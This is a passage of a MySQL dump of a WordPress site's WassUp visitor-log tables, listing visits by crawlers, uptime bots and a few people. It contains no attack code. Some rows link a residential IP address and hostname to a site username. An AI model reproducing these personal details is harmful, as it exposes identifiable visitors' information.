900','','','','akepecs','','0','51',0),(29691,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158194','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29694,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158399','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29697,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158410','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29698,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158575','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29701,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158576','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(29704,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158579','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29706,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158588','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29707,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158793','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29709,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158799','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29710,'0b_aed98c666391d661cf150bc5ea70f3f4','1463159209','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.rmgassfinancialllc.com/','',0,'MacOSX','Safari 9','us','','','','','','','0','0',0),(29713,'0b_aed98c666391d661cf150bc5ea70f3f4','1463159209','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.rmgassfinancialllc.com/','',0,'MacOSX','Safari 9','us','','','','','','','0','0',0),(29716,'0b_aed98c666391d661cf150bc5ea70f3f4','1463159244','209.64.152.62','209.64.152.62','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','','','','','','','0','0',0),(29719,'0b_a01064696839d0e86de1a104a3f32d7c','1463159643','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/SSO/235_39.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29721,'0b_41c71f52e6aa2e1362785feb1d0c4754','1463159945','64.233.172.181,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(29722,'0b_8d8d9f31f9fc9b971da9d35b057bc102','1463159948','64.233.172.173,24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.empireins.com/','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(29725,'0b_aed98c666391d661cf150bc5ea70f3f4','1463160344','209.64.152.62','209.64.152.62','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','1920 x 1080','','','','','','0','0',0),(29728,'0b_4c27ec17d416f49f4b57d8e960d607b8','1463162208','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(29730,'0b_b74453d5d3493ddda36288e8f44aa2d3','1463162989','207.46.13.38','msnbot-207-46-13-38.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29731,'0b_7b10e37cacb421f76738793ff3dc406f','1463166029','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29734,'0b_63612faf9c580717ce7ab24ec4477913','1463166423','66.249.66.40','crawl-66-249-66-40.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29736,'0b_63612faf9c580717ce7ab24ec4477913','1463167589','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29737,'0b_ad593338684a64652eec14b42c768b0c','1463167868','45.79.81.142','li1180-142.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(29739,'0b_493cf52a9dabf1bd3c0bd439320c11b0','1463206755','45.79.87.104','li1186-104.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29742,'0b_c2c7423941768d2f238f8601c6389152','1463255145','123.125.71.34','baiduspider-123-125-71-34.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(29743,'0b_5dd417d5e5da88546c99755d12908380','1463388816','45.79.81.142','li1180-142.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(29746,'0b_ada4c1f81fc7e64b6b4c08523cfefc6a','1463416157','45.79.81.142','li1180-142.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29749,'0b_f295b707d166f414e97f953099311183','1464232000','89.248.172.154','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29752,'0b_2d35893257e8c810399bac166cc0365d','1464365807','89.248.172.201','89-248-172-201.constellationservers.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29754,'0b_2a86d957841bd415b7a47ef1745dd66a','1465209420','169.54.233.118','76.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29755,'0b_c860e60b8b08f5d8436bbb90054bc79b','1466112551','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/about-us/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(29757,'0b_c860e60b8b08f5d8436bbb90054bc79b','1466112551','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/contact/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(29758,'0b_3e5053b3b50ff8d1ef25c5a72a81f6c6','1466598499','89.248.171.63','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29761,'0b_bdc7792fd89be93c1538cbafccf67c55','1466645941','89.248.172.173','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29762,'0b_4ea196b72490cafe20a78e45b7a1ac46','1467817883','123.125.67.206','123.125.67.206','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(29763,'0b_dbf25987d263fb690c68b5a4139d3334','1468587207','123.125.71.92','baiduspider-123-125-71-92.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(29764,'0b_e730ab98c821b3b02e73c366b3bf6306','1468882380','169.54.233.121','79.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29765,'0b_e58ae9c84900b462273484a89bc2da20','1469087513','169.54.233.126','7e.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29766,'0b_41d3264a15a4e741cd767be60137f8e7','1469932109','169.54.244.75','4b.f4.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29767,'0b_5a8487b99df5a4be4404692822dec7f2','1470135719','169.54.244.78','4e.f4.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29768,'0b_aad198579bae4f0ba3e58e9aac4fe409','1471323411','104.200.25.243','li774-243.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/0.2.19; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29769,'0b_fffaa3d4755efc88b3f6deb8b41a0591','1471329086','168.1.128.37','25.80.01a8.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29770,'0b_68d88a957cd8c7af9ec2f94611a993c6','1471362036','45.33.46.216','li996-216.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/0.2.22; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29771,'0b_588b526c352a7f42ec9688f617dc1e95','1472278750','104.200.25.243','li774-243.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/0.2.43; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(29772,'0b_f0e454ea8066847ab016c4e242ef1b1a','1472769546','169.54.233.124','7c.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29773,'0b_e7f4322f7f028fd70cc122205e78c747','1472947283','45.79.71.122','li1170-122.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29774,'0b_f191eb4f94dd03ecc701b1d045dd78cd','1473056663','45.79.95.64','li1194-64.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29775,'0b_b38bd7700c441b291d634773a7f78e8b','1473384193','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29776,'0b_118ee2fcc71431df9ca2768f23f716b7','1473852530','168.1.128.37','25.80.01a8.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29777,'0b_b8fc4f90cdbec5b050d53bb169f0d28d','1473978559','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29778,'0b_b8fc4f90cdbec5b050d53bb169f0d28d','1473978562','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29779,'0b_1a09f6b55f74fa8b258eee069a84b159','1473979050','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29780,'0b_1a09f6b55f74fa8b258eee069a84b159','1473979052','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29781,'0b_3fd397f43a8793d68b6c04f0c84215fd','1474123796','45.79.95.64','li1194-64.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29782,'0b_3fd397f43a8793d68b6c04f0c84215fd','1474123799','45.79.95.64','li1194-64.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29783,'0b_73d00a3adca88815c2eac991d143f7aa','1474171693','168.1.128.35','23.80.01a8.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29784,'0b_25479f603828d7cdda330b95cda0a539','1474185099','45.79.71.122','li1170-122.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29785,'0b_25479f603828d7cdda330b95cda0a539','1474185102','45.79.71.122','li1170-122.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29786,'0b_45469b732165b7ecb638f085aef44f38','1474323603','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29787,'0b_45469b732165b7ecb638f085aef44f38','1474323606','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29788,'0b_7b7d41123f59e581df465aa41ade06fe','1474399954','45.79.95.64','li1194-64.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29789,'0b_7b7d41123f59e581df465aa41ade06fe','1474399957','45.79.95.64','li1194-64.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29790,'0b_3bd0fcdfaac7dd5191b5ea08c7ede7ab','1474420329','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29791,'0b_3bd0fcdfaac7dd5191b5ea08c7ede7ab','1474420331','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(29792,'0b_6428858504d3e7c9b21241132e8a60de','1474961209','93.174.93.164','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29793,'0b_50bff29078db73222132c6570ab05c5e','1476098175','169.56.71.42','169.56.71.42','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29794,'0b_32be0b59ddfd4b37dcbf0785605e2c0c','1476414382','169.56.71.41','169.56.71.41','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29795,'0b_f02fecb0f662be49bb40b5ec6339fcf5','1477283453','169.54.233.125','7d.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0); /*!40000 ALTER TABLE `wp_wassup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wassup_meta` -- DROP TABLE IF EXISTS `wp_wassup_meta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wassup_meta` ( `meta_id` int(15) unsigned NOT NULL AUTO_INCREMENT, `wassup_key` varchar(150) NOT NULL, `meta_key` varchar(80) NOT NULL, `meta_value` longtext, `meta_expire` int(10) unsigned DEFAULT '0', UNIQUE KEY `meta_id` (`meta_id`), KEY `wassup_key` (`wassup_key`), KEY `meta_key` (`meta_key`) ) ENGINE=InnoDB AUTO_INCREMENT=33959 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wassup_meta` -- LOCK TABLES `wp_wassup_meta` WRITE; /*!40000 ALTER TABLE `wp_wassup_meta` DISABLE KEYS */; INSERT INTO `wp_wassup_meta` VALUES (33895,'89.248.172.154','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1464239200),(33898,'89.248.172.154','hostname','no-reverse-dns-configured.com',1464404801),(33901,'89.248.172.201','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1464373007),(33904,'89.248.172.201','hostname','89-248-172-201.constellationservers.net',1464538607),(33906,'169.54.233.118','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1465216620),(33909,'169.54.233.118','hostname','76.e9.36a9.ip4.static.sl-reverse.com',1465382220),(33912,'71.189.164.218','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1466119751),(33913,'71.189.164.218','hostname','static-71-189-164-218.lsanca.fios.frontiernet.net',1466285351),(33915,'71.189.164.218','hostname','static-71-189-164-218.lsanca.fios.frontiernet.net',1466285351),(33916,'89.248.171.63','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1466605699),(33919,'89.248.171.63','hostname','no-reverse-dns-configured.com',1466771299),(33922,'89.248.172.173','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1466653141),(33925,'89.248.172.173','hostname','no-reverse-dns-configured.com',1466818741),(33926,'123.125.67.206','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1467825083),(33927,'123.125.71.92','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1468594407),(33928,'123.125.71.92','hostname','baiduspider-123-125-71-92.crawl.baidu.com',1468760007),(33929,'169.54.233.121','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1468889580),(33930,'169.54.233.121','hostname','79.e9.36a9.ip4.static.sl-reverse.com',1469055180),(33931,'169.54.233.126','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1469094713),(33932,'169.54.233.126','hostname','7e.e9.36a9.ip4.static.sl-reverse.com',1469260313),(33933,'169.54.244.75','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1469939309),(33934,'169.54.244.75','hostname','4b.f4.36a9.ip4.static.sl-reverse.com',1470104909),(33935,'169.54.244.78','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1470142919),(33936,'169.54.244.78','hostname','4e.f4.36a9.ip4.static.sl-reverse.com',1470308519),(33937,'104.200.25.243','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1472285950),(33938,'104.200.25.243','hostname','li774-243.members.linode.com',1472451550),(33939,'168.1.128.37','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1473859730),(33940,'168.1.128.37','hostname','25.80.01a8.ip4.static.sl-reverse.com',1474025330),(33941,'45.33.46.216','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1471369236),(33942,'45.33.46.216','hostname','li996-216.members.linode.com',1471534836),(33943,'169.54.233.124','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1472776746),(33944,'169.54.233.124','hostname','7c.e9.36a9.ip4.static.sl-reverse.com',1472942346),(33945,'45.79.71.122','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1474192299),(33946,'45.79.71.122','hostname','li1170-122.members.linode.com',1474357899),(33947,'45.79.95.64','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1474407153),(33948,'45.79.95.64','hostname','li1194-64.members.linode.com',1474572754),(33949,'45.79.103.178','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1474427529),(33950,'45.79.103.178','hostname','li1202-178.members.linode.com',1474496403),(33951,'168.1.128.35','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1474178892),(33952,'168.1.128.35','hostname','23.80.01a8.ip4.static.sl-reverse.com',1474344493),(33953,'93.174.93.164','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1474968409),(33954,'93.174.93.164','hostname','no-reverse-dns-configured.com',1475134009),(33955,'169.56.71.42','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1476105375),(33956,'169.56.71.41','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1476421581),(33957,'169.54.233.125','_sessionhash','851050cb4ac018cc9b6c18cc7580831e',1477290653),(33958,'169.54.233.125','hostname','7d.e9.36a9.ip4.static.sl-reverse.com',1477456253); /*!40000 ALTER TABLE `wp_wassup_meta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wassup_tmp` -- DROP TABLE IF EXISTS `wp_wassup_tmp`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wassup_tmp` ( `id` mediumint(9) unsigned NOT NULL AUTO_INCREMENT, `wassup_id` varchar(60) NOT NULL, `timestamp` varchar(20) NOT NULL, `ip` varchar(50) DEFAULT NULL, `hostname` varchar(150) DEFAULT NULL, `urlrequested` text, `agent` varchar(255) DEFAULT NULL, `referrer` text, `search` varchar(255) DEFAULT NULL, `searchpage` int(11) unsigned DEFAULT '0', `os` varchar(15) DEFAULT NULL, `browser` varchar(50) DEFAULT NULL, `language` varchar(5) DEFAULT NULL, `screen_res` varchar(15) DEFAULT NULL, `searchengine` varchar(25) DEFAULT NULL, `spider` varchar(50) DEFAULT NULL, `feed` varchar(50) DEFAULT NULL, `username` varchar(50) DEFAULT NULL, `comment_author` varchar(50) DEFAULT NULL, `spam` varchar(5) DEFAULT '0', `url_wpid` varchar(50) DEFAULT NULL, `subsite_id` mediumint(9) unsigned DEFAULT '0', UNIQUE KEY `id` (`id`), KEY `idx_wassup` (`wassup_id`(32)), KEY `ip` (`ip`), KEY `timestamp` (`timestamp`) ) ENGINE=InnoDB AUTO_INCREMENT=7724 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wassup_tmp` -- LOCK TABLES `wp_wassup_tmp` WRITE; /*!40000 ALTER TABLE `wp_wassup_tmp` DISABLE KEYS */; INSERT INTO `wp_wassup_tmp` VALUES (7650,'0b_b74453d5d3493ddda36288e8f44aa2d3','1463162989','207.46.13.38','msnbot-207-46-13-38.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7653,'0b_b74453d5d3493ddda36288e8f44aa2d3','1463162996','207.46.13.38','msnbot-207-46-13-38.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot2.0','','','','0','0',0),(7654,'0b_7b10e37cacb421f76738793ff3dc406f','1463166029','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7657,'0b_7b10e37cacb421f76738793ff3dc406f','1463166029','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot2.0','','','','0','0',0),(7660,'0b_63612faf9c580717ce7ab24ec4477913','1463166423','66.249.66.40','crawl-66-249-66-40.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7662,'0b_63612faf9c580717ce7ab24ec4477913','1463167589','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7663,'0b_ad593338684a64652eec14b42c768b0c','1463167868','45.79.81.142','li1180-142.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(7665,'0b_493cf52a9dabf1bd3c0bd439320c11b0','1463206755','45.79.87.104','li1186-104.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7668,'0b_c2c7423941768d2f238f8601c6389152','1463255145','123.125.71.34','baiduspider-123-125-71-34.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(7669,'0b_5dd417d5e5da88546c99755d12908380','1463388816','45.79.81.142','li1180-142.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(7672,'0b_ada4c1f81fc7e64b6b4c08523cfefc6a','1463416157','45.79.81.142','li1180-142.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7675,'0b_f295b707d166f414e97f953099311183','1464232000','89.248.172.154','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7678,'0b_2d35893257e8c810399bac166cc0365d','1464365807','89.248.172.201','89-248-172-201.constellationservers.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7680,'0b_2a86d957841bd415b7a47ef1745dd66a','1465209420','169.54.233.118','76.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7681,'0b_c860e60b8b08f5d8436bbb90054bc79b','1466112551','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/about-us/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(7683,'0b_c860e60b8b08f5d8436bbb90054bc79b','1466112551','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/contact/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; 